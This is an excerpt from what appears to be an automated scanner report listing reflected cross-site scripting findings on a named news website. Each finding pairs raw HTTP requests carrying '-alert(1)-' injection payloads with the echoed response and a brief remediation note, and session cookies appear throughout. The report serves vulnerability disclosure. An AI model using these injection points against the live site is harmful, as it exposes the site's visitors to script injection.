GET /section/cool-gadgets?833d5'-alert(1)-'a846275ffde=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45686
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/cool-gadgets?833d5'-alert(1)-'a846275ffde=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84e0e'-alert(1)-'f803134282c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section84e0e'-alert(1)-'f803134282c/cool-gadgets/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:01 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40440
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section84e0e'-alert(1)-'f803134282c/cool-gadgets/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.146. http://www.technewsdaily.com/section/cool-gadgets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/cool-gadgets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5ac8'-alert(1)-'4bb59163af7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/cool-gadgets/?c5ac8'-alert(1)-'4bb59163af7=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:51:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:51:55 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 45704
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/cool-gadgets/?c5ac8'-alert(1)-'4bb59163af7=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95228'-alert(1)-'f2fafe09060 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section95228'-alert(1)-'f2fafe09060/future-tech HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40434
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section95228'-alert(1)-'f2fafe09060/future-tech",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.148. http://www.technewsdaily.com/section/future-tech [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/future-tech
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29de3'-alert(1)-'0ac924447e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/future-tech?29de3'-alert(1)-'0ac924447e7=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44659
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/future-tech?29de3'-alert(1)-'0ac924447e7=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 177c7'-alert(1)-'e9b5495fba8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section177c7'-alert(1)-'e9b5495fba8/future-tech/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:10 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40438
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section177c7'-alert(1)-'e9b5495fba8/future-tech/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.150. http://www.technewsdaily.com/section/future-tech/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/future-tech/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4109c'-alert(1)-'b3c666cfc65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/future-tech/?4109c'-alert(1)-'b3c666cfc65=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:05 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44677
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/future-tech/?4109c'-alert(1)-'b3c666cfc65=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e223b'-alert(1)-'cf82c55609a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sectione223b'-alert(1)-'cf82c55609a/how-to HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:39 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40424
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sectione223b'-alert(1)-'cf82c55609a/how-to",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.152. http://www.technewsdaily.com/section/how-to [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/how-to
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7a6f'-alert(1)-'ecdb04ae96b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/how-to?b7a6f'-alert(1)-'ecdb04ae96b=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44489
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/how-to?b7a6f'-alert(1)-'ecdb04ae96b=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb462'-alert(1)-'d9fa1703b88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sectioneb462'-alert(1)-'d9fa1703b88/how-to/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40428
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/sectioneb462'-alert(1)-'d9fa1703b88/how-to/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.154. http://www.technewsdaily.com/section/how-to/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/how-to/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80934'-alert(1)-'ee8fb2ef08a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/how-to/?80934'-alert(1)-'ee8fb2ef08a=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44507
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/how-to/?80934'-alert(1)-'ee8fb2ef08a=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dd41'-alert(1)-'48fa1ab35e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section1dd41'-alert(1)-'48fa1ab35e2/military-spy-tech HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40446
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section1dd41'-alert(1)-'48fa1ab35e2/military-spy-tech",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.156. http://www.technewsdaily.com/section/military-spy-tech [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/military-spy-tech
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2acfd'-alert(1)-'484bf885e33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section/military-spy-tech?2acfd'-alert(1)-'484bf885e33=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44671
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section/military-spy-tech?2acfd'-alert(1)-'484bf885e33=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca2ef'-alert(1)-'8e30d5ca4ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sectionca2ef'-alert(1)-'8e30d5ca4ef/military-spy-tech/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
